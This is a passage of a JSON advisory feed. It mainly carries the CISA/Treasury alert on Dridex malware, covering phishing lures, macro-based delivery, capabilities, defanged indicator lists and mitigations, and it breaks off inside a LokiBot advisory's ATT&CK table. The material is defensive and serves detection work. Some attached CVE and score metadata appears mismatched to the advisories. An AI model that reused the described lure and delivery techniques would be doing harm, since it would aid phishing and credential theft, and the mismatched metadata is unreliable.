"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T12:00:00", "type": "ics", "title": "Iranian State Actors Conduct Cyber Operations Against the Government of Albania", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-09-23T12:00:00", "id": "AA22-264A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-264a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:53:15", "description": "### Summary\n\nThis Alert is the result of recent collaboration between the Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury\u2019s Financial Crimes Enforcement Network (FinCEN) to identify and share information with the financial services sector. Treasury and the Cybersecurity and Infrastructure Security Agency (CISA) are providing this report to inform the sector about the Dridex malware and variants. The report provides an overview of the malware, related activity, and a list of previously unreported indicators of compromise derived from information reported to FinCEN by private sector financial institutions. Because actors using Dridex malware and its derivatives continue to target the financial services sector, including financial institutions and customers, the techniques, tactics, and procedures contained in this report warrant renewed attention. Treasury and CISA encourage network security specialists to incorporate these indicators into existing Dridex-related network defense capabilities and planning. For information regarding the malicious cyber actors responsible for the development and distribution of the Dridex malware, see the Treasury press release, [Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware](<https://home.treasury.gov/news/press-releases/sm845>) and the FBI press release, [Russian National Charged with Decade-Long Series of Hacking and Bank Fraud Offenses Resulting in Tens of Millions in Losses and Second Russian National Charged with Involvement in Deployment of \u201cBugat\u201d Malware](<https://www.justice.gov/opa/pr/russian-national-charged-decade-long-series-hacking-and-bank-fraud-offenses-resulting-tens?hootPostID=629d449ac4fd1b12d37f66d6551dbec1>).\n\n_This Alert does not introduce a new regulatory interpretation, nor impose any new requirements on regulated entities. Except where noted, there is no indication that the actual owner of the email address was involved in the suspicious or malicious activity. If activity related to these indicators of compromise is detected, please notify appropriate law enforcement and the CIG._\n\nFor a downloadable copy of IOCs, see:\n\n * [AA19-339A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA19-339A_WHITE.csv>)\n * [AA19-339A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA19-339A_WHITE_stix.xml>)\n\n### Technical Details\n\nThe Dridex malware, and its various iterations, has the capability to impact confidentiality of customer data and availability of data and systems for business processes. According to industry reporting, the original version of Dridex first appeared in 2012, and by 2015 had become one of the most prevalent financial Trojans. We expect actors using Dridex malware and its derivatives to continue targeting the financial services sector, including both financial institutions and customers.\n\n## Dridex-related Phishing Attributes\n\nActors typically distribute Dridex malware through phishing e-mail spam campaigns. Phishing messages employ a combination of legitimate business names and domains, professional terminology, and language implying urgency to persuade victims to activate open attachments. Sender e-mail addresses can simulate individuals (name@domain.com), administrative (admin@domain.com, support@domain.com), or common \u201cdo not reply\u201d local parts (noreply@domain.com). Subject and attachment titles can include typical terms such as \u201cinvoice\u201d, \u201corder\u201d, \u201cscan\u201d, \u201creceipt\u201d, \u201cdebit note\u201d, \u201citinerary\u201d, and others.\n\nThe e-mail messages vary widely. The e-mail body may contain no text at all, except to include attachments with names that are strings of numbers, apparently relying on the subject line and victim curiosity to coerce the opening of the malicious file. Where there is a message body, the body may specifically state that the contents of the e-mail underwent virus scanning or simply directs the victim toward the link or attachment. In other cases, the body may include a long, substantive message, providing multiple points of contact and context for the malicious attachment. Attachment and hyperlink names vary from random sets of numbers or imitation automatic filenames from scanners to filenames purporting to reference financial records. Attachments may or may not have direct references using the same file name or strings of numbers in the bodies of the e-mails.\n\n**Example Links and Filenames **(Note: link information is representative. Italicized statements are automatically generated by the cloud storage provider. # represents a random number.):\n\n * Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(_Cloud Services Provider_)[.]COM/S/(_Cloud Account Value_) /RECENT%20WIRE%20PAYMENT %######.SCR?(_Cloud Provided Sequence_)\n * Link: HTTPS://WWW.GOOGLE[.]COM/URL?Q=HTTPS://WWW.(_Cloud Services Provider_) [.]COM/S/ _Cloud Account Value_/AUTOMATEDCLEARINGHOUSE%20 PAYMENT####.DOC? (_Cloud Provided Sequence_)\n\n * Link: Malicious File: ID201NLD0012192016.DOC\n\nAttachments or eventual downloads can take a variety of formats. In some instances, malware downloaders are concealed in compressed files using the ZIP or RAR file formats. Occasionally compressed files within compressed files (double zipped) are used. The compressed files can include extensible markup language (.xml), Microsoft Office (.doc, .xls), Visual Basic (.vbs), JavaScript (.jar), or portable document format (.pdf) files. Many of the files, rather than containing the actual malware, contain hidden or obfuscated macros. Upon activation, the macros reach to a command and control server, FTP server, or cloud storage site to download the actual Dridex malware. In other cases, macros launch scripts that extract executables imbedded in the document as opposed to downloading the payload.\n\nBy default, software generally prevents execution of macros without user permission. Attached files, particularly .doc and .xls files, contain instructions on how a user should enable content and specifically macros, effectively using social engineering to facilitate the download. Malicious files sometimes even include screenshots of the necessary actions to enable macros.\n\n## Malware Capabilities\n\nDridex malware operates from multiple modules that may be downloaded together or following the initial download of a \u201cloader\u201d module. Modules include provisions for capturing screenshots, acting as a virtual machine, or incorporating the victim machine into a botnet. Through its history and development, Dridex has used several exploits and methods for execution, including modification of directory files, using system recovery to escalate privileges, and modification of firewall rules to facilitate peer-to-peer communication for extraction of data. Recent versions of Dridex exploit vulnerability CVE-2017-0199, which allows remote execution of code. This vulnerability is specific to Microsoft Office and WordPad. Microsoft released a patch in 2017.\n\nOnce downloaded and active, Dridex has a wide range of capabilities, from downloading additional software to establishing a virtual network to deletion of files. The primary threat to financial activity is the Dridex\u2019s ability to infiltrate browsers, detect access to online banking applications and websites, and inject malware or keylogging software, via API hooking, to steal customer login information. Dridex modules package, encrypt, and transmit captured information, screenshots, etc., via peer-to-peer (P2P) networks in the XML format or in binary format, as seen in newer versions. After stealing the login data, the attackers have the potential to facilitate fraudulent automated clearing house (ACH) and wire transfers, open fraudulent accounts, and potentially adapt victim accounts for other scams involving business e-mail compromise or money mule activity.\n\nThe Dridex malware has evolved through several versions since its inception, partially to adapt to updated browsers. Although the characteristics described reflect some of the most recent configurations, actors continue to identify and exploit vulnerabilities in widely used software.\n\n## Dridex Malware and Variants\n\nWhile Dridex is among the most prevalent sources of infection, previous variants and similar malware continue to represent a threat. Dridex is itself an improved variant of the Cridex and Bugat Trojans that preceded it, and it shares some of their codes. Although the previous variants\u2019 theft activities operate in mostly the same way, the P2P communication aspects of Dridex improve its concealment and redundancy.\n\n### Ransomware\n\nActors distributing Dridex likely employ ransomware with similar configurations. Code for BitPaymer, also known as Friedex, includes numerous similarities to Dridex, despite its function as ransomware rather than data extraction. The two malwares use the same mechanics for several functions, and the authors compiled the codes at nearly the same time. The ransomware distributed through these malwares has targeted U.S. financial institutions and resulted in data and financial loss.\n\nLocky ransomware operates using the same delivery method for the downloader, with similar subject lines and attachments. Attackers also use the same botnets to deliver both Dridex and Locky ransomware, sometimes simultaneously. Variants of Locky include Zepto and Osiris. Locky ransomware and its variants have a wide footprint, with varying impact depending on victim IT policies and practices and network configurations.\n\n## Dridex-related Activity\n\nAlthough the highest infection rates took place in late 2015 and early 2016, concurrent with Locky ransomware distribution, Dridex continues to impact numerous countries. The Dridex hackers appear to direct the majority of attacks at English-speaking countries. Cybersecurity industry reporting attributes Dridex, BitPaymer, and Locky campaigns, as well as other massive malware spam (malspam) campaigns to actors known alternately as Evil Corp or TA505. (Note: some cybersecurity industry reporting simply refers to the actors as \u201cDridex\u201d or the \u201cDridex hackers.\u201d) Actors distribute the malware via massive spam campaigns, sending up to millions of messages per day, although volume of messages varies widely.\n\n## Indicators of Compromise\n\nThe following indicators are associated with the activity described in this report:\n\n**Indicator Type** | **Indicator Value** | **Associated Activity** \n---|---|--- \nEmail address | info[@]antonioscognamiglio[.]it | Dridex \nEmail address | info[@]golfprogroup[.]com | Dridex \nEmail address | cariola72[@]teletu[.]it | Dridex \nEmail address | faturamento[@]sudestecaminhoes[.]com.br | Dridex \nEmail address | info[@]melvale[.]co.uk | Dridex \nEmail address | fabianurquiza[@]correo.dalvear[.]com.ar | Dridex \nEmail address | web1587p16[@]mail.flw-buero[.]at | Dridex \nEmail address | bounce[@]bestvaluestore[.]org | Dridex \nEmail address | farid[@]abc-telecom[.]az | Dridex \nEmail address | bounce[@]bestvaluestore[.]org | Dridex \nEmail address | admin[@]sevpazarlama[.]com | Dridex \nEmail address | faturamento[@]sudestecaminhoes[.]com.br | Dridex \nEmail address | pranab[@]pdrassocs[.]com | Dridex \nEmail address | tom[@]blackburnpowerltd[.]co.uk | Dridex \nEmail address | yportocarrero[@]elevenca[.]com | Dridex \nEmail address | s.palani[@]itifsl.co[.]in | Dridex \nEmail address | faber[@]imaba[.]nl | Dridex \nEmail address | admin[@]belpay[.]by | Dridex \nIP address | 62[.]149[.]158[.]252 | Dridex \nIP address | 177[.]34[.]32[.]109 | Dridex \nIP address | 2[.]138[.]111[.]86 | Dridex \nIP address | 122[.]172[.]96[.]18 | Dridex \nIP address | 69[.]93[.]243[.]5 | Dridex \nIP address | 200[.]43[.]183[.]102 | Dridex \nIP address | 79[.]124[.]76[.]30 | Dridex \nIP address | 188[.]125[.]166[.]114 | Dridex \nIP address | 37[.]59[.]52[.]64 | Dridex \nIP address | 50[.]28[.]35[.]36 | Dridex \nIP address | 154[.]70[.]39[.]158 | Dridex \nIP address | 108[.]29[.]37[.]11 | Dridex \nIP address | 65[.]112[.]218[.]2 | Dridex \n \n### Mitigations\n\nTreasury and CISA encourage users and organizations to:\n\n 1. Contact law enforcement immediately report regarding any identified activity related to Dridex malware or its derivatives. Please see contact information for FBI and CISA at the end of this report.\n 2. Incorporate the indicators of compromise identified in this report into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity. Note that the above list is not a comprehensive list of all indicators associated with this activity.\n 3. Report suspicious activity, highlighting the presence of \u201cCyber Event Indicators.\u201d Indicators of Compromise, such as suspicious e-mail addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. FinCEN welcomes voluntary SAR filing in circumstances where reporting is not required.\n\n## Recommendations for All Organizations\n\nThe following mitigation recommendations respond directly to Dridex TTPs:\n\n * Ensuring systems are set by default to prevent execution of macros.\n * Inform and educate employees on the appearance of phishing messages, especially those used by the hackers for distribution of malware in the past.\n * Update intrusion detection and prevention systems frequently to ensure the latest variants of malware and downloaders are included.\n * Conduct regular backup of data, ensuring backups are protected from potential ransomware attack.\n * Exercise employees\u2019 response to phishing messages and unauthorized intrusion.\n * If there is any doubt about message validity, call and confirm the message with the sender using a number or e-mail address already on file.\n * Treasury and CISA remind users and administrators to use the following best practices to strengthen the security posture of their organization\u2019s systems:\n * Maintain up-to-date antivirus signatures and engines.\n * Keep operating system patches up-to-date.\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n * Restrict users\u2019 ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.\n * Enforce a strong password policy and require regular password changes.\n * Exercise caution when opening email attachments even if the attachment is expected and the sender appears to be known.\n * Enable a personal firewall on workstations, and configure it to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \u201ctrue file type\u201d (i.e., the extension matches the file header).\n * Monitor users' web browsing habits; restrict access to sites with unfavorable content.\n * Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).\n * Scan all software downloaded from the Internet before executing.\n * Maintain situational awareness of the latest threats.\n * Implement appropriate access control lists.\n * Exercise cybersecurity procedures and continuity of operations plans to enhance and maintain ability to respond during and following a cyber incident.\n\nThe National Institute of Standards and Technology (NIST) has published additional information on malware incident prevention and handling in their Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops:\n\n * <https://www.nist.gov/publications/guide-malware-incident-prevention-and-handling-desktops-and-laptops>\n\n## Why Best Practices Matter\n\nThe National Security Agency (NSA) recently published its _Top Ten Cybersecurity Mitigation Strategies_ (This is the current website for Top 10 mitigation strategies: <https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1>). Aligned with the NIST Cybersecurity Framework, the Strategies offer a risk-based approach to mitigating exploitation techniques used by Advance Persistent Threat (APT) actors.\n\nThe _Strategies _counter a broad range of exploitation techniques used by malicious cyber actors. NSA\u2019s mitigations set priorities for enterprise organizations to minimize mission impact. The mitigations also build upon the NIST Cybersecurity Framework functions to manage cybersecurity risk and promote a defense-in-depth security posture. The mitigation strategies are ranked by effectiveness against known APT tactics. Additional strategies and best practices will be required to mitigate the occurrence of new tactics.\n\n 1. **Update and Upgrade Software Immediately. **Apply all available software updates, automate the process to the extent possible, and use an update service provided directly from the vendor. Automation is necessary because threat actors study patches and create exploits, often soon after a patch is released. These \u201cN-day\u201d exploits can be as damaging as a zero-day. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to assure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender\u2019s patch cycle.\n 2. **Defend Privileges and Accounts. **Assign privileges based on risk exposure and as required to maintain operations. Use a Privileged Access Management (PAM) solution to automate credential management and fine-grained access control. Another way to manage privilege is through tiered administrative access in which each higher tier provides additional access, but is limited to fewer personnel. Create procedures to securely reset credentials (e.g., passwords, tokens, tickets). Privileged accounts and services must be controlled because threat actors continue to target administrator credentials to access high-value assets, and to move laterally through the network.\n 3. **Enforce Signed Software Execution Policies.** Use a modern operating system that enforces signed software execution policies for scripts, executables, device drivers, and system firmware. Maintain a list of trusted certificates to prevent and detect the use and injection of illegitimate executables. Execution policies, when used in conjunction with a secure boot capability, can assure system integrity. Application Allow listing should be used with signed software execution policies to provide greater control. Allowing unsigned software enables threat actors to gain a foothold and establish persistence through embedded malicious code.\n 4. **Exercise a System Recovery Plan. **Create, review, and exercise a system recovery plan to ensure the restoration of data as part of a comprehensive disaster recovery strategy. The plan must protect critical data, configurations, and logs to ensure continuity of operations due to unexpected events. For additional protection, backups should be encrypted, stored offsite, offline when possible, and support complete recovery and reconstitution of systems and devices. Perform periodic testing and evaluate the backup plan. Update the plan as necessary to accommodate the ever-changing network environment. A recovery plan is a necessary mitigation for natural disasters as well as malicious threats including ransomware.\n 5. **Actively Manage Systems and Configurations. **Take inventory of network devices and software. Remove unwanted, unneeded, or unexpected hardware and software from the network. Starting from a known baseline reduces the attack surface and establishes control of the operational environment. Thereafter, actively manage devices, applications, operating systems, and security configurations. Active enterprise management ensures that systems can adapt to dynamic threat environments while scaling and streamlining administrative operations.\n 6. **Continuously Hunt for Network Intrusions.** Take proactive steps to detect, contain, and remove any malicious presence within the network. Enterprise organizations should assume that a compromise has taken place and use dedicated teams to continuously seek out, contain, and remove threat actors within the network. Passive detection mechanisms, such as logs, Security Information and Event Management (SIEM) products, Endpoint Detection and Response (EDR) solutions, and other data analytic capabilities are invaluable tools to find malicious or anomalous behaviors. Active pursuits should also include hunt operations and penetration testing using well documented incident response procedures to address any discovered breaches in security. Establishing proactive steps will transition the organization beyond basic detection methods, enabling real-time threat detection and remediation using a continuous monitoring and mitigation strategy.\n 7. **Leverage Modern Hardware Security Features. **Use hardware security features like Unified Extensible Firmware Interface (UEFI) Secure Boot, Trusted Platform Module (TPM), and hardware virtualization. Schedule older devices for a hardware refresh. Modern hardware features increase the integrity of the boot process, provide system attestation, and support features for high-risk application containment. Using a modern operating system on outdated hardware results in a reduced ability to protect the system, critical data, and user credentials from threat actors.\n 8. Segregate Networks Using Application-Aware Defenses. Segregate critical networks and services. Deploy application-aware network defenses to block improperly formed traffic and restrict content, according to policy and legal authorizations. Traditional intrusion detection based on known-bad signatures is quickly decreasing in effectiveness due to encryption and obfuscation techniques. Threat actors hide malicious actions and remove data over common protocols, making the need for sophisticated, application-aware defensive mechanisms critical for modern network defenses.\n 9. **Integrate Threat Reputation Services. **Leverage multi-sourced threat reputation services for files, DNS, URLs, IPs, and email addresses. Reputation services assist in the detection and prevention of malicious events and allow for rapid global responses to threats, a reduction of exposure from known threats, and provide access to a much larger threat analysis and tipping capability than an organization can provide on its own. Emerging threats, whether targeted or global campaigns, occur faster than most organizations can handle, resulting in poor coverage of new threats. Multi-source reputation and information sharing services can provide a more timely and effective security posture against dynamic threat actors.\n 10. **Transition to Multi-Factor Authentication. **Prioritize protection for accounts with elevated privileges, remote access, and/or used on high value assets. Physical token-based authentication systems should be used to supplement knowledge-based factors such as passwords and PINs. Organizations should migrate away from single factor authentication, such as password-based systems, which are subject to poor user choices and susceptible to credential theft, forgery, and reuse across multiple systems.\n\n### Contact Information\n\n**Reporting Suspected Malicious Activity**\n\nTo report an intrusion and request resources for incident response or technical assistance, contact CISA ([central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ) or 888-282-0870), FBI through a local field office (<https://www.fbi.gov/contact-us/field-offices>), or FBI\u2019s Cyber Division (CyWatch@fbi.gov or 855-292-3937).\n\nInstitutions should determine whether filing of a Suspicious Activity Report (\u201cSAR\u201d) is required under Bank Secrecy Act regulations. In instances where filing is not required, institutions may file a SAR voluntarily to aid FinCEN and law enforcement efforts in protecting the financial sector. Financial institutions are encouraged to provide relevant cyber-related information and indicators in their SAR reporting. For questions regarding cyber SAR filing, please contact the FinCEN Resource Center (FRC@fincen.gov or 1-800-767-2825).\n\n## **Open-Source Reporting On Dridex**\n\nThe following represents an alphabetized selection of open-source reporting by U.S. government and industry sources on Dridex malware and its derivatives:\n\n * \u201cDridex P2P Malware,\u201d US-CERT Alert (TA15-286A), [https://www.us-cert.gov/ncas/alerts/TA15-286A, 13 October 2015](<https://www.us-cert.gov/ncas/alerts/TA15-286A,%2013%20October%202015>).\n * \u201cDridex Threat Profile,\u201d New Jersey Cybersecurity & Communications Integration Cell, <https://www.cyber.nj.gov/threat-profiles/trojan-variants/dridex>, accessed 15 April 2019.\n * Alert Logic, \u201cDridex malware has evolved to Locky Ransomware,\u201d No date, <https://www.alertlogic.com/resources/threat-reports/dridex-malware-has-evolved-to-locky-ransomware/>, accessed 11 March 2019.\n * Avast Blog, \u201cA closer look at the Locky ransomware,\u201d 10 March 2016, <https://blog.avast.com/a-closer-look-at-the-locky-ransomware>, accessed 6 February 2019.\n * Brett Stone-Gross, Ph.D., \u201cDridex (Bugat v5) Botnet Takeover Operation, Secureworks, 13 October 2015, <https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation>, accessed 6 February 2019.\n * Brewster, Thomas, \u201cCops Knock Down Dridex Malware that Earned \u2018Evil Corp\u2019 Cybercriminals At Least $50 Million,\u201d Forbes, 13 October 2015, <https://www.forbes.com/sites/thomasbrewster/2015/10/13/dridex-botnet-takedown/#2b883f00415b>.\n * Chandler, Andy, \u201cFBI announces Dridex gang indictment and praises Fox-IT,\u201d Fox-IT, 13 October 2015, <https://www.fox-it.com/en/about-fox-it/corporate/news/fbi-announces-dridex-gang-indictments-praises-fox/>, accessed 7 February 2019.\n * DHS CISA, \u201cAlert (TA15-286A), Dridex P2P Malware,\u201d <https://www.us-cert.gov/ncas/alerts/TA15-286A>, accessed 4 June 2019.\n * Eduard Kovacs, \u201cDridex still active after takedown attempt,\u201d Security Week, 19 October 2015, <https://www.securityweek.com/dridex-still-active-after-takedown-attempt>, accessed 11 March 2019.\n * Geoff White, \u201cHow the Dridex Gang makes millions from bespoke ransomware,\u201d Forbes, 26 September 2018, <https://www.forbes.com/sites/geoffwhite/2018/09/26/how-the-dridex-gang-makes-millions-from-bespoke-ransomware/>, accessed 11 March 2019.\n * MS-ISAC, \u201cCybercrime Technical Desk Reference,\u201d 31 August 2018, <https://www.cisecurity.org/wp-content/uploads/2018/09/MS-ISAC-Cyber-Crime-Technical-Desk-Reference.pdf>, accessed 6 February 2019.\n * O\u2019Brien, Dick. \u201cDridex: Tidal waves of spam pushing dangerous financial Trojan,\u201d Symantec, February 2016, <http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf>, accessed 4 February 2019.\n * Poslu\u0161n\u00fd, Michal, \u201cFriedEx: BitPaymer ransomware the work of Dridex authors, welivesecurity by ESET, 26 January 2018, <https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/>, accessed 6 February 2019.\n * Proofpoint, \u201cDridex Campaigns Hitting Millions of Recipients Using Unpatched Microsoft Zero-Day,\u201d <https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-recipients-unpatched-microsoft-zero-day>, accessed 5 February 2019.\n * Proofpoint, \u201cHigh-Volume Dridex Banking Trojan Campaigns Return.\u201d <https://www.proofpoint.com/us/threat-insight/post/high-volume-dridex-campaigns-return>, accessed 1 February 2019.\n * Proofpoint, \u201cThreat Actor Profile: TA505, From Dridex to GlobeImposter,\u201d <https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter>, accessed 6 February 2019.\n * Roland Dela Paz and Ran Mosessco. \u201cNew year, new look \u2013 Dridex via compromised FTP,\u201d ForcePoint, 18 January 2018, <https://blogs.forcepoint.com/blog/security-labs/new-year-new-look-dridex-compromised-ftp>, accessed 4 February 2019.\n * Sanghavi, Mithun. \u201cDRIDEX and how to overcome it.\u201d Symantec Official Blog, 30 March 2015, <https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it>, accessed 4 February 2019.\n * Security Intelligence Blog, \u201cURSNIF, EMOTET, DRIDEX and BitPaymer Gangs Linked by a Similar Loader,\u201d Trend Micro, 18 December 2018, <https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/>, accessed 6 February 2019.\n * Talos Group, \u201cThreat Spotlight: Spam Served With a Side of Dridex,\u201d Cisco Blogs, 6 April 2015, <https://blogs.cisco.com/security/talos/spam-dridex>, accessed 4 February 2019.\n\n### Revisions\n\nDecember 5, 2019: Initial version|December 5, 2019: Added links to Treasury and FBI press releases|January 2, 2020: Updated CISA contact information\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-30T12:00:00", "type": "ics", "title": "Dridex Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-06-30T12:00:00", "id": "AA19-339A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-339a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:33:48", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) frameworks for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the[ Multi-State Information Sharing & Analysis Center (MS-ISAC)](<https://www.cisecurity.org/ms-isac/>).\n\nCISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA\u2019s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.\n\n### Technical Details\n\nLokiBot\u2014also known as Lokibot, Loki PWS, and Loki-bot\u2014employs Trojan malware to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials.\n\n * The malware steals credentials through the use of a keylogger to monitor browser and desktop activity (_Credentials from Password Stores_ [[T1555](<https://attack.mitre.org/versions/v7/techniques/T1555/>)]). \n * (_Credentials from Password Stores: Credentials from Web Browsers_ [[T1555.003](<https://attack.mitre.org/versions/v7/techniques/T1555/003>)])\n * (_Input Capture: Keylogging_ [[T1056.001](<https://attack.mitre.org/versions/v7/techniques/T1056/001>)])\n * LokiBot can also create a backdoor into infected systems to allow an attacker to install additional payloads (_Event Triggered Execution: Accessibility Features_ [[T1546.008](<https://attack.mitre.org/versions/v7/techniques/T1546/008/>)]).\n * Malicious cyber actors typically use LokiBot to target Windows and Android operating systems and distribute the malware via email, malicious websites, text, and other private messages (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v7/techniques/T1204/002/>)]). See figure 1 for enterprise techniques used by LokiBot.\n\n![](/sites/default/files/2020-09/091520_LokiBot_Malware_Alert.png)\u200b\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by LokiBot_\n\nSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications, including the following.\n\n * **February 2020: **Trend Micro identified cyber actors using LokiBot to impersonate a launcher for Fortnite\u2014a popular video game.[[1](<https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file/>)]\n * **August 2019: **FortiGuard SE researchers discovered a malspam campaign distributing LokiBot information-stealing payloads in spearphishing attack on a U.S. manufacturing company.[[2](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot#:~:text=The%20FortiGuard%20Labs%20SE%20team%20identified%20a%20new,manufacturing%20company%20utilizing%20the%20well%20documented%20infostealer%20LokiBot.>)]\n * **August 2019:** Trend Micro researchers reported LokiBot malware source code being hidden in image files spread as attachments in phishing emails.[[3](<https://www.zdnet.com/article/lokibot-information-stealer-now-hides-malware-in-image-files/>)]\n * **June 2019: **Netskope uncovered LokiBot being distributed in a malspam campaign using ISO image file attachments.[[4](<https://www.securityweek.com/lokibot-and-nanocore-malware-distributed-iso-image-files>)]\n * **April 2019:** Netskope uncovered a phishing campaign using malicious email attachments with LokiBot malware to create backdoors onto infected Windows systems and steal sensitive information.[[5](<https://www.netskope.com/blog/lokibot-nanocore-iso-disk-image-files>)]\n * **February 2018: **Trend Micro discovered CVE-2017-11882 being exploited in an attack using Windows Installer service to deliver LokiBot malware.[[6](<https://www.trendmicro.com/en_us/research/18/b/attack-using-windows-installer-msiexec-exe-leads-lokibot.html>)]\n * **October 2017:** SfyLabs identified cyber actors using LokiBot as an Android banking trojan that turns into ransomware.[[7](<https://www.bleepingcomputer.com/news/security/lokibot-android-banking-trojan-turns-into-ransomware-when-you-try-to-remove-it/>)]\n * **May 2017: **Fortinet reported malicious actors using a PDF file to spread a new LokiBot variant capable of stealing credentials from more than 100 different software tools.[[8](<https://www.fortinet.com/blog/threat-research/new-loki-variant-being-spread-via-pdf-file>)]\n * **March 2017:** Check Point discovered LokiBot malware found pre-installed on Android devices.[[9](<https://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/>)]\n * **December 2016:** Dr.Web researchers identified a new LokiBot variant targeting Android core libraries.[[10](<https://www.bleepingcomputer.com/news/security/loki-trojan-infects-android-libraries-and-system-process-to-get-root-privileges/>)]\n * **February 2016: **Researchers discovered the LokiBot Android Trojan infecting the core Android operating system processes.[[11](<https://www.cyber.nj.gov/threat-center/threat-profiles/android-malware-variants/lokibot>)]\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, [LokiBot](<https://attack.mitre.org/versions/v7/software/S0447/>) uses the ATT&CK techniques listed in table 1.\n\n_Table 1: LokiBot ATT&CK techniques _\n\nTechnique\n\n| \n\nUse \n \n---|--- \n \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016>)]\n\n| \n\nLokiBot has the ability to discover the domain name of the infected host. \n \n_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/versions/v7/techniques/T1027/>)]\n\n| \n\nLokiBot has obfuscated strings with base64 encoding. \n \n_Obfuscated Files or Information: Software Packing_ [[T1027.002](<https://attack.mitre.org/versions/v7/techniques/T1027/002/>)]\n\n| \n\nLokiBot has used several packing methods for obfuscation. \n \n_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v7/techniques/T1033>)]\n\n| \n\nLokiBot has the ability to discover the username on the infected host. \n \n_Exfiltration Over C2 Channel_ [[T1041](<https://attack.mitre.org/versions/v7/techniques/T1041/>)]\n\n| \n\nLokiBot has the ability to initiate contact with command and control to exfiltrate stolen data. \n \n_Process Injection: Process Hollowing_ 